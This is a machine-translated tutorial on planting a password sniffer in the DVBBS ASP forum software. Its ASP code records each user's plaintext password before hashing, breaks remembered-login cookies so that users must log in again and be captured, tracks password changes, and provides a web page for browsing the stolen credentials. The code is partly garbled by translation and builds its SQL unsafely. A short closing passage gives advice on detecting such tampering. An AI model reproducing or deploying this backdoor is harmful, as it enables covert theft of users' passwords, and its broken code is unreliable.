Add a password sniffer (dvbbs) for the dynamic network forum)

With its powerful and comprehensive functions, the mobile network pioneer Forum, coupled with its free provision to individual users, is unique among numerous online forums. Many people regard it as the best choice for their own forums. However, the new version of the Forum uses irreversible MD5 encryption for user passwords. Even Administrators cannot query the passwords of individual users. The encrypted results can only be queried in the database.

First, describe the login process. The user enters the account ID, calls the MD5 function, and encrypts the entered password. Then, compare whether the data stored in the database and the encrypted password are the same. If the logon succeeds, the personal information is saved in the cookie.

Now we have to do it ourselves to add a password record function for the Forum.

View the source file of the login. asp file that it logs into the system. The verification process directly calls the chklogin () function. Follow up with the chklogin () function, you can see the previous sentence is to check whether the user input is complete, then:

Password = MD5 (TRIM (checkstr (Request ("password "))))

The MD5 encryption function is called to encrypt the password submitted by the user. We want to record unencryptedCode, You need to add your code to the front of this sentence. Don't rush to write code, because we need to store the password in the database, so we should first assume our own table in the database.

Open the database file of the dynamic network, because we only need to save two items in this table: user name and password, so open "create table with designer", Field Names enter user, pass, the data type is text. Save the table and name it hacker.

Next we can go to ASP Program To add the user name and password to the table we just created. We only need to add the following two sentences before the above Code:

'First query the database and check whether the user's password has been recorded to avoid repeated addition

Set rsw.conn.exe cute ("Select User from hacker where user =" & request ("username ")&"")

If Rs. EOF and Rs. bof then

'If no, insert the user name and password into the table we just created.

SQL = "insert into hacker (user, pass) values (" & request ("username") & "," & request ("password ")&")"

Conn.exe cute (SQL)

Rs. Close

Else

End if

Through the above Code, the user name and password will be automatically added to the hacker table we created each time a user logs in.

However, the BBS also has a function, that is, you can use cookies to save login information for one day, one month, or one year, so that you do not need to enter the account for each access, of course, we do not want this part of user's password to be missed, so we need to find a way to invalidate its cookie so that it must log on through the modified file.

The code for Cookie check in the \ Inc \ const. asp file is saved on the Internet forum. Let's open and view its source file.

Membername = checkstr (request. Cookies ("aspsky") ("username "))

Memberclass = checkstr (request. Cookies ("aspsky") ("userclass "))

Memberword = checkstr (request. Cookies ("aspsky") ("password "))

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] is used to check information stored in the user cookie. We only need to change any variable, so that its login fails. I added the following code after the second sentence:

'Check whether your account has been recorded. If not, change the password variable to the user name.

Set rsw.conn.exe cute ("Select User from hacker where user =" & membername &"")

If Rs. EOF and Rs. bof then

Memberword = checkstr (request. Cookies ("aspsky") ("username "))

Rs. Close

Else

'If the cookie has been recorded, it will verify that everything is normal, so that the cookie will not be permanently invalidated and cause user suspicion.

Memberword = checkstr (request. Cookies ("aspsky") ("password "))

End if

The code for recording the user account is basically complete. As long as the user logs in, his account will be directly added to our database. However, we also missed a point, that is, if the user changes the password, the password we recorded will expire, and our record program will not be able to judge whether the password has been modified. So we need to continue to modify the password modification program modifypsw. asp.

RS ("userpassword") = Password

RS ("quesion") = quesion

RS ("Answer") = answer

Rs. Update

The above code is the password update code. Let's analyze: the password can be changed only after the user logs in. Since the user logs in, the password must be recorded in our database, no matter what the password is, we only need to update our database, so Add the following two sentences before the above four sentences:

[$ Nbsp] [$ nbsp] 'note that the password variable is not used here because it is encrypted by MD5.

SQL = "Update hacker set pass =" & request ("psw") & "where user =" & membername &""

Conn.exe cute (SQL)

In the end, it is impossible to open the database to query the user's password every time. Therefore, we need to write an ASP program to query the user's password through the Web interface.

The following is my own ASP code. I borrowed a function from the dynamic network forum for fuzzy query. You can directly search the user name to obtain the account or display all the recorded accounts.

<! -- # Include file = "conn. asp" -->

<! -- # Include file = "INC/Const. asp" -->

<%

'Net function for fuzzy search translate ()

Public Function translate (sourcestr, fieldstr)

[$ Nbsp] [$ nbsp] Dim sourcelist

[$ Nbsp] [$ nbsp] Dim resultstr

[$ Nbsp] [$ nbsp] Dim I, j

[$ Nbsp] [$ nbsp] If instr (sourcestr, "")> 0 then

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Dim isoperator

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] sourcelist = Split (sourcestr)

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] ----------------------------------------------------

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Rem response. write "Num:" & CSTR (ubound (sourcelist) & "<br>"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] for I = 0 to ubound (sourcelist)

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Rem response. Write I

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Select case ucase (sourcelist (I ))

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Case "and", "&", "and", "and"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr & "and"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Case "or", "|", "or"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr & "or"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Case "not ","! "," Not ","! ","! "

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr & "not"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Case "(","(","("

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr &"("

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Case ")",")",")"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr &")"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = true

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] case else

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] If sourcelist (I) <> "" then

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] if not isoperator then resultstr = resultstr & "and"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] If instr (sourcelist (I ), "%")> 0 then

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr & "" & fieldstr & "like" & replace (sourcelist (I ), "","")&""

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] else

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] resultstr = resultstr & "" & fieldstr & "like %" & replace (sourcelist (I ), "", "") & "%"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] end if

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] isoperator = false

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] end if

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] End select

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Rem response. write resultstr + "<br>"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Next

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Translate = resultstr

[$ Nbsp] [$ nbsp] else single condition

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] If instr (sourcestr, "%")> 0 then

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Translate = "" & fieldstr & "like" & replace (sourcestr, "","")&""

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] else

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] Translate = "" & fieldstr & "like %" & replace (sourcestr ,"","") & "%"

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] end if

[$ Nbsp] [$ nbsp] end if

End Function

%>

<%

'Check whether fuzzy query is used. If yes, query the database.

If request. Form ("ID") <> "then

Dim key

Key = request. Form ("ID ")

Set rsw.conn.exe cute ("Select User, pass from hacker where (" & translate (key, "user ")&")")

'Check whether all accounts are queried. If yes, query all records.

Else if request. querystring ("ID") <> "all" then

Else

Set rsw.conn.exe cute ("select * from hacker ")

End if

End if

%>

<Div align = "center">

[$ Nbsp] [$ nbsp] <p> <strong> query password </strong> </P>

[$ Nbsp] [$ nbsp] <form name = "form1" method = "Post" Action = "">

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] User Name:

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <input name = "ID" type = "text" size = "12">

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp]

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <input type = "Submit" name = "Submit" value = "Search">

[$ Nbsp] [$ nbsp] </form>

[$ Nbsp] [$ nbsp] <p> <a href = "test. asp? Id = all "> show all </a> </P>

[$ Nbsp] [$ nbsp] <Table width = "300" border = "1" cellspacing = "0" cellpadding = "0">

<%

'Check whether the account is queried. If the account is not displayed, select the query method. Otherwise, the query result is displayed.

If request. querystring ("ID") <> "" or request. Form ("ID") <> "" Then %> <tr>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <TD width = "150"> <Div align = "center"> username </div> </TD>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <TD width = "150"> <Div align = "center"> password </div> </TD>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] </tr>

<% Do while (not Rs. EOF) %> <tr>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <TD> <% = RS ("user ") %> </TD>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] [$ nbsp] <TD> <% = RS ("pass ") %> </TD>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp] </tr>

[$ Nbsp] [$ nbsp] <% Rs. movenext

[$ Nbsp] [$ nbsp] Loop

[$ Nbsp] [$ nbsp] Rs. Close

[$ Nbsp] [$ nbsp] else

[$ Nbsp] [$ nbsp] response. Write ("<tr> <TD> <center> select a query method </center> </TD> </tr> ")

[$ Nbsp] [$ nbsp] end if

[$ Nbsp] [$ nbsp] %>

[$ Nbsp] [$ nbsp] </table>

</Div>

[$ Nbsp] [$ nbsp] [$ nbsp] [$ nbsp]

other ideas:
If the server is hacked, we must prevent the Forum from being modified and become a tool for others to obtain the password, therefore, we need to consider the common means of hackers.
first, we need to check whether the database is complete at any time, and ensure that the database is distributed in a timely manner. Now it is popular to change the database suffix to ASP on the Internet. Adding a non-deleteable table to the database can effectively prevent the database from being downloaded by others. In other words, hackers are likely to change the suffix of their own database files to ASP, thus hiding in many files. Generally, it is difficult for inexperienced administrators to find out, so they should regularly check the files on the entire website. If the ASP files are displayed for no reason, it is likely that they are only behind the scenes.
hackers can not only store their own ASP files, but also hide their ASP files in their existing ASP files. The browser can send querystring variables to ASP files. If ASP sets a Condition Statement: If query. String ("variable") = "then ...... This simple method is hard to prevent. Because of the convenience of the database, administrators seldom check whether files on the server have been modified. Therefore, it is necessary to regularly check whether the file is modified.